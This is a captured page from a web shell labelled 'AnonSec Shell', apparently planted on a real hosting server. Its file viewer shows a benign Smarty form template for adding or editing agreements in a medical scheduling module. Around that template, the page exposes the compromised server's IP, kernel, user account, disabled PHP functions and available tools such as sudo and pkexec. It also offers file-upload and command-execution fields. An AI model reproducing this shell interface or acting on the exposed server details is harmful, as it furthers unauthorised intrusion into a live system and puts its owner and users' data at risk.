AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.15
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/rodeio/application/plugins/module_med_scheduling/views/agreement/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/rodeio/application/plugins/module_med_scheduling/views/agreement/add.tpl
<div class="wrapper wrapper-content">

    {$action = 'create'}
    {$title_action = $_L['Agreement_Add_Module']}
    {if (!empty($agreements))}
        {$action = 'update'}
        {$title_action = $_L['Agreement_Edit_Module']}
    {/if}

    <form class="form-horizontal" method="post" action="{$_url}module_med_scheduling/agreement/{$action}">

        <div class="row">

            <div class="col-md-12">

                <div class="ibox float-e-margins">

                    <div class="ibox-title">
                        <h5>{$title_action}</h5>
                        <a href="{$_url}module_med_scheduling/agreement/listAgreement"
                           class="btn btn-xs btn-primary btn-rounded pull-right">
                            <i class="fa fa-bars"></i> {$_L['Agreement_List']}
                        </a>
                    </div>

                    <div class="ibox-content" id="ibox_form">

                        <div class="row">

                            <div class="col-md-12 col-sm-12 col-xs-12">
                                {$agreement = ''}
                                {if (!empty($agreements->agreement))}
                                    {$agreement = $agreements->agreement}
                                {/if}
                                <label class="control-label" for="title">
                                    {$_L['Agreement_Agreement']} <small class="red">*</small>
                                </label>
                                <input type="text" name="agreement" id="agreement" class="form-control"
                                       value="{$agreement}" required>
                            </div>

                        </div>

                        <div class="row">

                            <div class="col-md-12 col-sm-12 col-xs-12">
                                {$code = ''}
                                {if (!empty($agreements->code))}
                                    {$code = $agreements->code}
                                {/if}
                                <label class="control-label" for="title">
                                    {$_L['Agreement_Code']} <small class="red">*</small>
                                </label>
                                <input type="text" name="code" id="code" class="form-control"
                                       value="{$code}" required>
                            </div>

                        </div>

                        <div class="row" style="margin-top:20px">
                            <div class=" col-md-12 form-group">
                                <div class="col-lg-10">
                                    {if !empty($agreements->id)}
                                        <input type="hidden" id="agreementId" name="id" value="{$agreements->id}">
                                    {/if}
                                    <button class="md-btn md-btn-primary waves-effect waves-light" type="submit" id="submit">
                                        <i class="fa fa-check"></i> {$_L['Submit']}
                                    </button>
                                    | <a href="{$_url}module_med_scheduling/agreement/listAgreement">{$_L['Or Cancel']}</a>
                                </div>
                            </div>
                        </div>

                    </div>

                </div>

            </div>

        </div>

    </form>

</div>

Anon7 - 2022
AnonSec Team